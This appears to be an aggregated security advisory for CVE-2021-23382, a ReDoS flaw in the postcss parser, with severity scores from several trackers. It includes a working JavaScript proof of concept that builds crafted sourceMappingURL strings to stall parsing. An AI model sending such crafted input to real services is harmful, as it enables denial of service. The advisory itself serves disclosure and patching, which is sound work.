CVE-2021-23382
ADVISORY - githubSummary
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
PoC
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
EPSS Score: 0.00071 (0.215)
Common Weakness Enumeration (CWE)
ADVISORY - nist
Inefficient Regular Expression Complexity
ADVISORY - github
Uncontrolled Resource Consumption
ADVISORY - gitlab
ADVISORY - redhat
Uncontrolled Resource Consumption
NIST
CREATED
UPDATED
ADVISORY IDCVE-2021-23382
EXPLOITABILITY SCORE
3.9
EXPLOITS FOUND
COMMON WEAKNESS ENUMERATION (CWE)
CVSS SCORE
5.3mediumGitHub
CREATED
UPDATED
ADVISORY IDGHSA-566m-qj78-rww5
EXPLOITABILITY SCORE
3.9
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)
CVSS SCORE
5.3mediumDebian
CREATED
UPDATED
ADVISORY IDCVE-2021-23382
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Ubuntu
CREATED
UPDATED
ADVISORY IDCVE-2021-23382
EXPLOITABILITY SCORE
3.9
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
CVSS SCORE
7.5mediumRed Hat
CREATED
UPDATED
ADVISORY IDCVE-2021-23382
EXPLOITABILITY SCORE
3.9
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)
CVSS SCORE
5.3mediumintheWild
CREATED
UPDATED
ADVISORY IDCVE-2021-23382
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-